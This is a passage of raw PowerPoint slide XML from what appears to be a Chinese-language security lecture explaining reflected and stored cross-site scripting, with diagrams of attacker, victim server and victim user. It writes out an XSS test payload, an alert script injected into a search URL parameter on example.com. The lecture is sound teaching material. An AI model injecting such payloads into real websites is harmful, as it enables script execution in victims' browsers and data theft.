              </a:rPr>
              <a:t>是由用户提供的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457197">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>现在，攻击者向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>用户发送以下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，并诱骗他点击链接：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.example.com/search?input=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;alert(“attack”);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457197">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>一旦受害者点击此链接，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>请求将被发送到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>网站服务器，该服务器返回包含搜索结果的页面，并在页面中显示原始输入。 这里的输入是一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>代码，它运行在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>用户的浏览器上，从而将用户的隐私信息泄漏）。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3712937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602" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="304800"/>
            <a:ext cx="8382000" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>存储型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25603" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="2601913"/>
            <a:ext cx="1436688" cy="1436687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25604" name="Picture 11" descr="CompaqAlphaServerES40"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5959475" y="4979988"/>
            <a:ext cx="1155700" cy="1420812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25605" name="Picture 4" descr="DS15serverfront"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5564188" y="1905000"/>
            <a:ext cx="2436812" cy="846138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25606" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="1524000"/>
            <a:ext cx="1467068" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="660066"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25607" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="4552950"/>
            <a:ext cx="1467068" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>受害服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="660066"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25608" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5576887" y="3652838"/>
            <a:ext cx="1801813" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25609" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="3886200"/>
            <a:ext cx="1210588" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>受害用户</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="660066"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25610" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6684963" y="3313971"/>
            <a:ext cx="870000" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>插入恶意脚本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25611" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2274888" y="3962400"/>
            <a:ext cx="2830512" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25612" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3036888" y="4067175"/>
            <a:ext cx="2141537" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>请求内容</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25613" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2311400" y="4568825"/>
            <a:ext cx="2932113" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>接收恶意脚本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25614" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6750050" y="2865438"/>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a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25615" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1039646">
            <a:off x="2713038" y="3703638"/>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a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25616" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2084388" y="4086225"/>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a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25617" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="4324350"/>
            <a:ext cx="3352800" cy="1162050"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25618" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2198688" y="2205038"/>
            <a:ext cx="3211512" cy="687387"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25619" name="TextBox 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2791761" y="2060545"/>
            <a:ext cx="2236510" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>偷取有价值的数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25620" name="Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-713606">
            <a:off x="2438400" y="2359025"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4812673" y="3557045"/>
            <a:ext cx="1876423" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>存储恶意数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1338336" y="4848175"/>
            <a:ext cx="1813629" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>下载</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>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311700" y="504739"/>
            <a:ext cx="8520600" cy="763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a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>存储型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="Shape 93"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4955001" y="1356967"/>
            <a:ext cx="3796800" cy="3919800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457197">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击者直接将数据发送到目标网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>服务器，将数据存储在持久存储中。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457197">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>如果网站稍后将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>存储的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>发送给其他用户，则会在用户和攻击者之间创建一个通道。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457197">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>示例：社交网络中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
